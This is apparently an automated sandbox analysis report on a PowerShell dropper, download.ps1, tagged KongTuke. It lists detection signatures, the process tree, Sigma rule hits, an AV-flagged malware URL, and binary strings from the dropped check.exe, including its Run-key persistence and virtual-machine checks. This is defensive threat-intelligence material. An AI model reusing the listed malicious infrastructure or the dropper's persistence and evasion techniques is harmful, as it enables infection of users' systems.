Windows Analysis Report
download.ps1

Overview

General Information

Sample name: download.ps1
Analysis ID: 1570493
MD5: aa53e9e42c8f90023dc846e2cb391fc0
SHA1: 7508cfcd899cfe941a85d085d847b74958a93bce
SHA256: 4af7ee1bbb06bf40d82f8d6c50d8624caeebd2e61fb2af97d9f8d5fe35c0d3ed
Tags: KongTuke, ps1, user-monitorsg
Infos:

Detection

Score: 68
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Opens network shares
Powershell drops PE file
Binary contains a suspicious time stamp
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • powershell.exe (PID: 7160 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 6256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • check.exe (PID: 2792 cmdline: "C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe" MD5: 00152720A2C1C6969E3581E2DABC6702)
      • check.exe (PID: 1520 cmdline: "C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe" MD5: 00152720A2C1C6969E3581E2DABC6702)
        • cmd.exe (PID: 3276 cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 4568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • WMIC.exe (PID: 1248 cmdline: wmic computersystem get manufacturer MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • WerFault.exe (PID: 2164 cmdline: C:\Windows\system32\WerFault.exe -u -p 1520 -s 892 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • check.exe (PID: 2604 cmdline: "C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe" MD5: 00152720A2C1C6969E3581E2DABC6702)
    • check.exe (PID: 3608 cmdline: "C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe" MD5: 00152720A2C1C6969E3581E2DABC6702)
      • cmd.exe (PID: 1532 cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 4752 cmdline: wmic computersystem get manufacturer MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • WerFault.exe (PID: 2556 cmdline: C:\Windows\system32\WerFault.exe -u -p 3608 -s 968 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • check.exe (PID: 6584 cmdline: "C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe" MD5: 00152720A2C1C6969E3581E2DABC6702)
    • check.exe (PID: 5300 cmdline: "C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe" MD5: 00152720A2C1C6969E3581E2DABC6702)
      • cmd.exe (PID: 4720 cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 2272 cmdline: wmic computersystem get manufacturer MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • WerFault.exe (PID: 1656 cmdline: C:\Windows\system32\WerFault.exe -u -p 5300 -s 932 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process started Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 7160, ProcessName: powershell.exe
Source: Registry Key set Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7160, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NetUtilityApp
Source: File created Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7160, TargetFilename: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
Source: Process started Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 7160, ProcessName: powershell.exe
No Suricata rule has matched

AV Detection

Source: http://hkinuxb3bz.top/1.php?s=527 Avira URL Cloud: Label: malware
Source: Submitted Sample Integrated Neural Analysis Model: Matched 91.5% probability
Source: Binary string: C:\Users\qt\work\qt\qtsvg\plugins\iconengines\qsvgicon.pdb source: check.exe, 00000004.00000003.2222374412.000001C184424000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtsvg\plugins\imageformats\qsvg.pdb source: check.exe, 00000004.00000003.2223763846.000001C184424000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\plugins\generic\qtuiotouchplugin.pdb source: check.exe, 00000004.00000003.2222127490.000001C184424000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: d:\agent\_work\1\s\\binaries\amd64ret\bin\amd64\\msvcp140.amd64.pdb source: check.exe, 00000005.00000002.2761324036.00007FF8B83B5000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\plugins\imageformats\qico.pdb source: check.exe, 00000004.00000003.2223434926.000001C184424000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: check.exe, 00000005.00000002.2749724831.00007FF89F1D2000.00000002.00000001.01000000.0000001A.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: check.exe, 00000004.00000003.2254086538.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2763315652.00007FF8BFBA4000.00000002.00000001.01000000.0000000B.sdmp
Source: Binary string: d:\agent\_work\1\s\\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: check.exe, 00000004.00000003.2206358241.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2762439180.00007FF8BA4F5000.00000002.00000001.01000000.00000015.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: check.exe, 00000004.00000003.2254233123.000001C184425000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\plugins\styles\qwindowsvistastyle.pdb%% source: check.exe, 00000005.00000002.2760252195.00007FF8B8277000.00000002.00000001.01000000.00000027.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\plugins\styles\qwindowsvistastyle.pdb source: check.exe, 00000005.00000002.2760252195.00007FF8B8277000.00000002.00000001.01000000.00000027.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: check.exe, 00000005.00000002.2763117904.00007FF8BFB73000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: check.exe, 00000004.00000003.2254830143.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2761899392.00007FF8B8CB6000.00000002.00000001.01000000.0000001C.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Core.pdbT source: check.exe, 00000005.00000002.2750673646.00007FF89F7A6000.00000002.00000001.01000000.00000012.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Gui.pdb source: check.exe, 00000005.00000002.2743333905.00007FF89DF9A000.00000002.00000001.01000000.00000024.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: check.exe, 00000004.00000003.2254947920.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2762068252.00007FF8B90EB000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: check.exe, 00000004.00000003.2254329878.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2762795539.00007FF8BA51D000.00000002.00000001.01000000.0000000F.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: check.exe, 00000004.00000003.2255169584.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2760981184.00007FF8B8319000.00000002.00000001.01000000.00000017.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\python313.pdb source: check.exe, 00000005.00000002.2758624413.00007FF89FF78000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: check.exe, 00000004.00000003.2254233123.000001C184425000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: d:\agent\_work\1\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: check.exe, 00000004.00000003.2205718666.000001C184424000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtimageformats\plugins\imageformats\qtiff.pdbBB source: check.exe, 00000004.00000003.2223972781.000001C184424000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\plugins\platformthemes\qxdgdesktopportal.pdb source: check.exe, 00000004.00000003.2227016406.000001C184425000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: check.exe, 00000004.00000003.2263045929.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2747911281.00007FF89ED47000.00000002.00000001.01000000.00000020.sdmp
Source: Binary string: d:\agent\_work\1\s\\binaries\amd64ret\bin\amd64\\msvcp140_1.amd64.pdb source: check.exe, 00000004.00000003.2195204413.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2762606642.00007FF8BA503000.00000002.00000001.01000000.00000014.sdmp
Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: check.exe, 00000005.00000002.2749724831.00007FF89F26A000.00000002.00000001.01000000.0000001A.sdmp
Source: Binary string: D:\a\1\b\libssl-3.pdbDD source: check.exe, 00000005.00000002.2748572981.00007FF89EDD5000.00000002.00000001.01000000.0000001B.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Core.pdb source: check.exe, 00000005.00000002.2750673646.00007FF89F7A6000.00000002.00000001.01000000.00000012.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtimageformats\plugins\imageformats\qtiff.pdb source: check.exe, 00000004.00000003.2223972781.000001C184424000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\plugins\imageformats\qgif.pdb source: check.exe, 00000004.00000003.2222491102.000001C184424000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_wmi.pdb(('GCTL source: check.exe, 00000004.00000003.2255442707.000001C184425000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtimageformats\plugins\imageformats\qtga.pdb source: check.exe, 00000004.00000003.2223857971.000001C184424000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: check.exe, 00000004.00000003.2254086538.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2763315652.00007FF8BFBA4000.00000002.00000001.01000000.0000000B.sdmp
Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: check.exe, 00000005.00000002.2749724831.00007FF89F26A000.00000002.00000001.01000000.0000001A.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtimageformats\plugins\imageformats\qicns.pdb source: check.exe, 00000004.00000003.2222581886.000001C184424000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: check.exe, 00000004.00000003.2262892198.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2762283867.00007FF8B9843000.00000002.00000001.01000000.00000018.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: check.exe, 00000004.00000003.2254947920.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2762068252.00007FF8B90EB000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: check.exe, 00000004.00000003.2255084714.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2761734389.00007FF8B8C13000.00000002.00000001.01000000.0000001D.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_wmi.pdb source: check.exe, 00000004.00000003.2255442707.000001C184425000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Widgets.pdb source: check.exe, 00000005.00000002.2744275585.00007FF89E59A000.00000002.00000001.01000000.00000023.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\plugins\platforms\qwindows.pdb source: check.exe, 00000005.00000002.2741705628.00007FF89D8B4000.00000002.00000001.01000000.00000026.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\python3.pdb source: check.exe, 00000004.00000003.2259702970.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2735934243.0000029FD7590000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtimageformats\plugins\imageformats\qwbmp.pdb source: check.exe, 00000004.00000003.2224216053.000001C184424000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\libEGL.pdb source: check.exe, 00000004.00000003.2208243247.000001C184424000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\libssl-3.pdb source: check.exe, 00000005.00000002.2748572981.00007FF89EDD5000.00000002.00000001.01000000.0000001B.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: check.exe, 00000005.00000002.2760756443.00007FF8B82EE000.00000002.00000001.01000000.00000019.sdmp
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Code function: 4_2_00007FF7124F83C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,4_2_00007FF7124F83C0
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Code function: 4_2_00007FF7124F9280 FindFirstFileExW,FindClose,4_2_00007FF7124F9280
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Code function: 4_2_00007FF712511874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,4_2_00007FF712511874
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Code function: 5_2_00007FF7124F9280 FindFirstFileExW,FindClose,5_2_00007FF7124F9280
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Code function: 5_2_00007FF7124F83C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,5_2_00007FF7124F83C0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: Joe Sandbox View IP Address: 104.20.23.46
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: nodejs.org
Source: check.exe, 00000005.00000003.2319400919.0000029FD99CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://.../back.j(
Source: check.exe, 00000005.00000002.2738851397.0000029FD9F30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://.../back.jpeg
Source: check.exe, 00000004.00000003.2263045929.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2255302902.000001C184425000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digi
Source: check.exe, 00000004.00000003.2208243247.000001C184424000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredID
Source: check.exe, 00000005.00000003.2319400919.0000029FD99CA000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2282278745.0000029FD9A01000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD99C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
Source: check.exe, 00000005.00000003.2319400919.0000029FD99CA000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2313843486.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD99C5000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.certigna.fr/certignarootca.crl01
Source: check.exe, 00000005.00000003.2319400919.0000029FD99CA000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD99C5000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2736379235.0000029FD90E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: check.exe, 00000005.00000002.2737420337.0000029FD97E0000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2313843486.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl
Source: check.exe, 00000005.00000003.2313843486.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl
Source: check.exe, 00000005.00000003.2319400919.0000029FD99CA000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD99C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl0
Source: check.exe, 00000005.00000002.2737420337.0000029FD9ABB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl
Source: check.exe, 00000005.00000002.2736668202.0000029FD947E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl0
Source: check.exe, 00000005.00000003.2312815285.0000029FD9AC3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD9ABB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl
Source: check.exe, 00000005.00000002.2736668202.0000029FD947E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: check.exe, 00000005.00000002.2737420337.0000029FD9ABB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl
Source: check.exe, 00000005.00000003.2319400919.0000029FD99CA000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD99C5000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2736668202.0000029FD93C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: check.exe, 00000004.00000003.2259191458.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2262892198.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2254482244.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2255442707.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2255169584.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2263045929.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2259702970.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2254329878.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2260368350.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2254679847.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2256951106.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2254830143.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2255084714.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2254947920.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2255302902.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2256951106.000001C18442C000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2259344289.000001C184425000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: check.exe, 00000004.00000003.2224356100.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2197903575.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2208243247.000001C184430000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2223972781.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2224674718.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2225043556.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2198901562.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2202718129.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2223559467.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2222374412.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2222581886.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2226406918.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2196346858.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2223857971.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2208719982.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2200573092.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2223763846.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2203572756.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2201279267.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2222127490.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 
00000004.00000003.2227016406.000001C184425000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: check.exe, 00000004.00000003.2224356100.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2197903575.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2223972781.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2224674718.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2225043556.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2198901562.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2202718129.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2223559467.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2222374412.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2222581886.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2226406918.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2196346858.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2223857971.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2208719982.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2200573092.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2223763846.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2203572756.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2201279267.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2222127490.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2227016406.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 
00000004.00000003.2223434926.000001C184424000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
